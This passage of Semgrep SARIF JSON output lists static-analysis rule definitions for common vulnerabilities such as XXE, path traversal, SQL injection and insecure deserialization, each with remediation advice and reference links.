library."},"helpUri":"https://semgrep.dev/r/python.django.security.injection.path-traversal.path-traversal-open.path-traversal-open","id":"python.django.security.injection.path-traversal.path-traversal-open.path-traversal-open","name":"python.django.security.injection.path-traversal.path-traversal-open.path-traversal-open","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.security.injection.path-traversal.path-traversal-open.path-traversal-open"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Untrusted input could be used to tamper with a web page rendering, which can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. To prevent this vulnerability, validate URLs and their protocol before using them in your codebase."},"help":{"markdown":"Untrusted input could be used to tamper with a web page rendering, which can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. To prevent this vulnerability, validate URLs and their protocol before using them in your codebase.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/typescript.react.react-href-url.react-href-url)\n - [https://github.com/segmentio/ui-box/blob/master/src/utils/safeHref.ts](https://github.com/segmentio/ui-box/blob/master/src/utils/safeHref.ts)\n","text":"Untrusted input could be used to tamper with a web page rendering, which can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. To prevent this vulnerability, validate URLs and their protocol before using them in your codebase."},"helpUri":"https://semgrep.dev/r/typescript.react.react-href-url.react-href-url","id":"typescript.react.react-href-url.react-href-url","name":"typescript.react.react-href-url.react-href-url","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","HIGH CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: typescript.react.react-href-url.react-href-url"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Checks for requests to http (unencrypted) sites using gorequest, a popular HTTP client library. This is dangerous because it could result in plaintext PII being passed around the network."},"help":{"markdown":"Checks for requests to http (unencrypted) sites using gorequest, a popular HTTP client library. This is dangerous because it could result in plaintext PII being passed around the network.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/problem-based-packs.insecure-transport.go-stdlib.sling-http-request.sling-http-request)\n - [https://godoc.org/github.com/dghubble/sling#Sling.Add](https://godoc.org/github.com/dghubble/sling#Sling.Add)\n - [https://github.com/dghubble/sling](https://github.com/dghubble/sling)\n","text":"Checks for requests to http (unencrypted) sites using gorequest, a popular HTTP client library. This is dangerous because it could result in plaintext PII being passed around the network."},"helpUri":"https://semgrep.dev/r/problem-based-packs.insecure-transport.go-stdlib.sling-http-request.sling-http-request","id":"problem-based-packs.insecure-transport.go-stdlib.sling-http-request.sling-http-request","name":"problem-based-packs.insecure-transport.go-stdlib.sling-http-request.sling-http-request","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: problem-based-packs.insecure-transport.go-stdlib.sling-http-request.sling-http-request"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Found potentially unsafe handling of redirect behavior $X. Do not pass `params` to `redirect_to` without the `:only_path => true` hash value."},"help":{"markdown":"Found potentially unsafe handling of redirect behavior $X. Do not pass `params` to `redirect_to` without the `:only_path => true` hash value.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.rails.security.brakeman.check-redirect-to.check-redirect-to)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html)\n","text":"Found potentially unsafe handling of redirect behavior $X. Do not pass `params` to `redirect_to` without the `:only_path => true` hash value."},"helpUri":"https://semgrep.dev/r/ruby.rails.security.brakeman.check-redirect-to.check-redirect-to","id":"ruby.rails.security.brakeman.check-redirect-to.check-redirect-to","name":"ruby.rails.security.brakeman.check-redirect-to.check-redirect-to","properties":{"precision":"very-high","tags":["CWE-601: URL Redirection to Untrusted Site ('Open Redirect')","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.rails.security.brakeman.check-redirect-to.check-redirect-to"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) or XIncludes which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. It is our recommendation to secure this parser against XXE attacks by configuring $FACTORY with `$FACTORY.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `$FACTORY.setExpandEntityReferences(false)` `$FACTORY.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)` `$FACTORY.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` `$FACTORY.setFeature(\"http://xml.org/sax/features/external-general-entities\", false)`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"help":{"markdown":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) or XIncludes which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. It is our recommendation to secure this parser against XXE attacks by configuring $FACTORY with `$FACTORY.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `$FACTORY.setExpandEntityReferences(false)` `$FACTORY.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)` `$FACTORY.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` `$FACTORY.setFeature(\"http://xml.org/sax/features/external-general-entities\", false)`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.xxe.documentbuilderfactory-xxe-parse.documentbuilderfactory-xxe-parse)\n - [https://blog.sonarsource.com/secure-xml-processor/](https://blog.sonarsource.com/secure-xml-processor/)\n - [https://blog.sonarsource.com/understanding-xxe-vulnerabilities/](https://blog.sonarsource.com/understanding-xxe-vulnerabilities/)\n - [https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)\n - [https://cwe.mitre.org/data/definitions/611.html](https://cwe.mitre.org/data/definitions/611.html)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n - [https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E](https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E)\n - [https://github.com/semgrep/java-xxe-research](https://github.com/semgrep/java-xxe-research)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n - [https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755](https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755)\n","text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) or XIncludes which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. It is our recommendation to secure this parser against XXE attacks by configuring $FACTORY with `$FACTORY.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `$FACTORY.setExpandEntityReferences(false)` `$FACTORY.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)` `$FACTORY.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` `$FACTORY.setFeature(\"http://xml.org/sax/features/external-general-entities\", false)`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"helpUri":"https://semgrep.dev/r/java.lang.security.xxe.documentbuilderfactory-xxe-parse.documentbuilderfactory-xxe-parse","id":"java.lang.security.xxe.documentbuilderfactory-xxe-parse.documentbuilderfactory-xxe-parse","name":"java.lang.security.xxe.documentbuilderfactory-xxe-parse.documentbuilderfactory-xxe-parse","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","HIGH CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.xxe.documentbuilderfactory-xxe-parse.documentbuilderfactory-xxe-parse"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In Flask apps, consider using the Werkzeug util `werkzeug.utils.secure_filename()` to sanitize paths and filenames."},"help":{"markdown":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In Flask apps, consider using the Werkzeug util `werkzeug.utils.secure_filename()` to sanitize paths and filenames.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.file.tainted-path-traversal-aiofile-flask.tainted-path-traversal-aiofile-flask)\n - [https://flask.palletsprojects.com/en/2.3.x/patterns/fileuploads/](https://flask.palletsprojects.com/en/2.3.x/patterns/fileuploads/)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n - [https://owasp.org/www-community/attacks/Path_Traversal](https://owasp.org/www-community/attacks/Path_Traversal)\n - [https://portswigger.net/web-security/file-path-traversal](https://portswigger.net/web-security/file-path-traversal)\n - [https://werkzeug.palletsprojects.com/en/3.0.x/utils/#werkzeug.utils.secure_filename](https://werkzeug.palletsprojects.com/en/3.0.x/utils/#werkzeug.utils.secure_filename)\n","text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In Flask apps, consider using the Werkzeug util `werkzeug.utils.secure_filename()` to sanitize paths and filenames."},"helpUri":"https://semgrep.dev/r/python.flask.file.tainted-path-traversal-aiofile-flask.tainted-path-traversal-aiofile-flask","id":"python.flask.file.tainted-path-traversal-aiofile-flask.tainted-path-traversal-aiofile-flask","name":"python.flask.file.tainted-path-traversal-aiofile-flask.tainted-path-traversal-aiofile-flask","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.file.tainted-path-traversal-aiofile-flask.tainted-path-traversal-aiofile-flask"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected possible formatted SQL query. Use parameterized queries instead."},"help":{"markdown":"Detected possible formatted SQL query. Use parameterized queries instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.audit.formatted-sql-query.formatted-sql-query)\n - [https://stackoverflow.com/questions/775296/mysql-parameterized-queries](https://stackoverflow.com/questions/775296/mysql-parameterized-queries)\n","text":"Detected possible formatted SQL query. Use parameterized queries instead."},"helpUri":"https://semgrep.dev/r/python.lang.security.audit.formatted-sql-query.formatted-sql-query","id":"python.lang.security.audit.formatted-sql-query.formatted-sql-query","name":"python.lang.security.audit.formatted-sql-query.formatted-sql-query","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","LOW CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.audit.formatted-sql-query.formatted-sql-query"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Found an insecure gRPC connection using 'insecure.NewCredentials()'. This creates a connection without encryption to a gRPC server. A malicious attacker could tamper with the gRPC message, which could compromise the machine. Instead, establish a secure connection with an SSL certificate using the 'grpc.WithTransportCredentials()' function. You can create a create credentials using a 'tls.Config{}' struct with 'credentials.NewTLS()'. The final fix looks like this: 'grpc.WithTransportCredentials(credentials.NewTLS())'."},"help":{"markdown":"Found an insecure gRPC connection using 'insecure.NewCredentials()'. This creates a connection without encryption to a gRPC server. A malicious attacker could tamper with the gRPC message, which could compromise the machine. Instead, establish a secure connection with an SSL certificate using the 'grpc.WithTransportCredentials()' function. You can create a create credentials using a 'tls.Config{}' struct with 'credentials.NewTLS()'. The final fix looks like this: 'grpc.WithTransportCredentials(credentials.NewTLS())'.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.grpc.tls.grpc-client-new-insecure-connection.grpc-client-new-insecure-connection)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"Found an insecure gRPC connection using 'insecure.NewCredentials()'. This creates a connection without encryption to a gRPC server. A malicious attacker could tamper with the gRPC message, which could compromise the machine. Instead, establish a secure connection with an SSL certificate using the 'grpc.WithTransportCredentials()' function. You can create a create credentials using a 'tls.Config{}' struct with 'credentials.NewTLS()'. The final fix looks like this: 'grpc.WithTransportCredentials(credentials.NewTLS())'."},"helpUri":"https://semgrep.dev/r/go.grpc.tls.grpc-client-new-insecure-connection.grpc-client-new-insecure-connection","id":"go.grpc.tls.grpc-client-new-insecure-connection.grpc-client-new-insecure-connection","name":"go.grpc.tls.grpc-client-new-insecure-connection.grpc-client-new-insecure-connection","properties":{"precision":"very-high","tags":["CWE-300: Channel Accessible by Non-Endpoint","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: go.grpc.tls.grpc-client-new-insecure-connection.grpc-client-new-insecure-connection"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"EC2 instances should not have a public IP address attached in order to block public access to the instances. To fix this, set your `associate_public_ip_address` to `\"false\"`."},"help":{"markdown":"EC2 instances should not have a public IP address attached in order to block public access to the instances. To fix this, set your `associate_public_ip_address` to `\"false\"`.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-ec2-has-public-ip.aws-ec2-has-public-ip)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n","text":"EC2 instances should not have a public IP address attached in order to block public access to the instances. To fix this, set your `associate_public_ip_address` to `\"false\"`."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-ec2-has-public-ip.aws-ec2-has-public-ip","id":"terraform.aws.security.aws-ec2-has-public-ip.aws-ec2-has-public-ip","name":"terraform.aws.security.aws-ec2-has-public-ip.aws-ec2-has-public-ip","properties":{"precision":"very-high","tags":["CWE-284: Improper Access Control","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-ec2-has-public-ip.aws-ec2-has-public-ip"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"This call makes a world-writable file which allows any user on a machine to write to the file. This may allow attackers to influence the behaviour of this process by writing to the file."},"help":{"markdown":"This call makes a world-writable file which allows any user on a machine to write to the file. This may allow attackers to influence the behaviour of this process by writing to the file.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/cpp.lang.security.filesystem.world-writable-file.world-writable-file)\n - [https://wiki.sei.cmu.edu/confluence/display/c/FIO06-C.+Create+files+with+appropriate+access+permissions](https://wiki.sei.cmu.edu/confluence/display/c/FIO06-C.+Create+files+with+appropriate+access+permissions)\n","text":"This call makes a world-writable file which allows any user on a machine to write to the file. This may allow attackers to influence the behaviour of this process by writing to the file."},"helpUri":"https://semgrep.dev/r/cpp.lang.security.filesystem.world-writable-file.world-writable-file","id":"cpp.lang.security.filesystem.world-writable-file.world-writable-file","name":"cpp.lang.security.filesystem.world-writable-file.world-writable-file","properties":{"precision":"very-high","tags":["CWE-732: Incorrect Permission Assignment for Critical Resource","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: cpp.lang.security.filesystem.world-writable-file.world-writable-file"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected SHA1 hash algorithm which is considered insecure. SHA1 is not collision resistant and is therefore not suitable as a cryptographic signature. Instead, use PBKDF2 for password hashing or SHA256 or SHA512 for other hash function applications."},"help":{"markdown":"Detected SHA1 hash algorithm which is considered insecure. SHA1 is not collision resistant and is therefore not suitable as a cryptographic signature. Instead, use PBKDF2 for password hashing or SHA256 or SHA512 for other hash function applications.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/clojure.lang.security.use-of-sha1.use-of-sha1)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Password_Storage_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Password_Storage_Cheat_Sheet.html)\n","text":"Detected SHA1 hash algorithm which is considered insecure. SHA1 is not collision resistant and is therefore not suitable as a cryptographic signature. Instead, use PBKDF2 for password hashing or SHA256 or SHA512 for other hash function applications."},"helpUri":"https://semgrep.dev/r/clojure.lang.security.use-of-sha1.use-of-sha1","id":"clojure.lang.security.use-of-sha1.use-of-sha1","name":"clojure.lang.security.use-of-sha1.use-of-sha1","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","CWE-328: Use of Weak Hash","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: clojure.lang.security.use-of-sha1.use-of-sha1"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Provisioners are a tool of last resort and should be avoided where possible. Provisioner behavior cannot be mapped by Terraform as part of a plan, and execute arbitrary shell commands by design."},"help":{"markdown":"Provisioners are a tool of last resort and should be avoided where possible. Provisioner behavior cannot be mapped by Terraform as part of a plan, and execute arbitrary shell commands by design.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-provisioner-exec.aws-provisioner-exec)\n - [https://developer.hashicorp.com/terraform/language/resources/provisioners/remote-exec](https://developer.hashicorp.com/terraform/language/resources/provisioners/remote-exec)\n - [https://developer.hashicorp.com/terraform/language/resources/provisioners/local-exec](https://developer.hashicorp.com/terraform/language/resources/provisioners/local-exec)\n","text":"Provisioners are a tool of last resort and should be avoided where possible. Provisioner behavior cannot be mapped by Terraform as part of a plan, and execute arbitrary shell commands by design."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-provisioner-exec.aws-provisioner-exec","id":"terraform.aws.security.aws-provisioner-exec.aws-provisioner-exec","name":"terraform.aws.security.aws-provisioner-exec.aws-provisioner-exec","properties":{"precision":"very-high","tags":["CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection')","CWE-94: Improper Control of Generation of Code ('Code Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-provisioner-exec.aws-provisioner-exec"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. It is our recommendation to secure this parser against XXE attacks by configuring the parser with `factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)`. Alternatively, enabling both of the following configurations also provides protection against XXE attacks. `factory.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` and `factory.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, \"\")`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"help":{"markdown":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. It is our recommendation to secure this parser against XXE attacks by configuring the parser with `factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)`. Alternatively, enabling both of the following configurations also provides protection against XXE attacks. `factory.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` and `factory.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, \"\")`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.servlets.security.xxe.tainted-schemafactory-xxe-servlet.tainted-schemafactory-xxe-servlet)\n - [https://semgrep.dev/blog/2022/xml-security-in-java](https://semgrep.dev/blog/2022/xml-security-in-java)\n - [https://semgrep.dev/docs/cheat-sheets/java-xxe/](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n - [https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E](https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E)\n - [https://github.com/semgrep/java-xxe-research](https://github.com/semgrep/java-xxe-research)\n - [https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)\n - [https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755](https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755)\n - [https://blog.sonarsource.com/secure-xml-processor/](https://blog.sonarsource.com/secure-xml-processor/)\n - [https://blog.sonarsource.com/understanding-xxe-vulnerabilities/](https://blog.sonarsource.com/understanding-xxe-vulnerabilities/)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n - [https://cwe.mitre.org/data/definitions/611.html](https://cwe.mitre.org/data/definitions/611.html)\n - [https://cwe.mitre.org/data/definitions/827.html](https://cwe.mitre.org/data/definitions/827.html)\n","text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. It is our recommendation to secure this parser against XXE attacks by configuring the parser with `factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)`. Alternatively, enabling both of the following configurations also provides protection against XXE attacks. `factory.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` and `factory.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, \"\")`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"helpUri":"https://semgrep.dev/r/java.servlets.security.xxe.tainted-schemafactory-xxe-servlet.tainted-schemafactory-xxe-servlet","id":"java.servlets.security.xxe.tainted-schemafactory-xxe-servlet.tainted-schemafactory-xxe-servlet","name":"java.servlets.security.xxe.tainted-schemafactory-xxe-servlet.tainted-schemafactory-xxe-servlet","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","CWE-776: Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')","HIGH CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: java.servlets.security.xxe.tainted-schemafactory-xxe-servlet.tainted-schemafactory-xxe-servlet"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.secrets.mongodb.hardcoded-connection-url.hardcoded-connection-url)\n - [https://docs.rs/mongodb/latest/mongodb/](https://docs.rs/mongodb/latest/mongodb/)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/rust.secrets.mongodb.hardcoded-connection-url.hardcoded-connection-url","id":"rust.secrets.mongodb.hardcoded-connection-url.hardcoded-connection-url","name":"rust.secrets.mongodb.hardcoded-connection-url.hardcoded-connection-url","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: rust.secrets.mongodb.hardcoded-connection-url.hardcoded-connection-url"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) The `pandas.read_pickle()` function uses `pickle` for object deserialization and should not be used with untrusted data."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) The `pandas.read_pickle()` function uses `pickle` for object deserialization and should not be used with untrusted data.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.pyramid.deserialization.tainted-pandas-pickle-pyramid.tainted-pandas-pickle-pyramid)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n - [https://pandas.pydata.org/docs/reference/api/pandas.read_pickle.html](https://pandas.pydata.org/docs/reference/api/pandas.read_pickle.html)\n - [https://docs.python.org/3/library/pickle.html](https://docs.python.org/3/library/pickle.html)\n - [https://redfoxsec.com/blog/insecure-deserialization-in-python/](https://redfoxsec.com/blog/insecure-deserialization-in-python/)\n - [https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html](https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html)\n - 